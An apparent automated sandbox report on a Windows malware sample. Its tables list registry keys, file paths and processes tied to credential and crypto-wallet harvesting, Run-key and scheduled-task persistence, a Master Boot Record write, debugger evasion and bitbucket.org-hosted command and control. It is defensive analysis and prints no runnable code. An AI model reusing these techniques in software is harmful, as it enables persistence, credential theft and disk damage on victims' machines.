Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\17.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\18.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\20.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key queried \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\10525010101\4eTHv9F.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EPJNTN.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\EUDTULILGQF\\EPJNTN.exe" C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YKIEPH.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IWMFQQVZSJJ\\YKIEPH.exe" C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\IKEYSH.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\JPIWVOKNNNG\\IKEYSH.exe" C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EQNSWE.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\IYIHEEUWQGQ\\EQNSWE.exe" C:\Users\Admin\AppData\Local\Temp\IYIHEEUWQGQ\EQNSWE.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WPIWQX.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ZEQDUMMYDHR\\WPIWQX.exe" C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PHYSICALDRIVE0 C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A

Enumerates processes with tasklist

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\tasklist.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10525030101\428f70aea8.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dumer.job C:\Temper\pzoljWug.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JPIWVOKNNNG\IKEYSH.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Work\7z.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-32CF7.tmp\tktVLbc.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-1ECSM.tmp\O1sOUoo.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\321c2a24e4\dumer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10524440101\O1sOUoo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\SynapseR86.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\sc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-77AKN.tmp\Tu_Inspector32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Temper\mSPVyMsH.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\ZEQDUMMYDHR\WPIWQX.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\10525040101\O1sOUoo.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\Patchfm\XPFix.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\YHNPKZDRXKX\UJLYNQ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EUDTULILGQF\EPJNTN.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IWMFQQVZSJJ\YKIEPH.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-V0DA8.tmp\O1sOUoo.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\findstr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133957773121482320" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2012121138-1878458325-808874697-1000\{6BF0B290-0816-466E-B4AA-1FA674C5B302} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SynapseR86.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Work\NSudoLG.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\system32\regsvr32.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SynapseR86.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
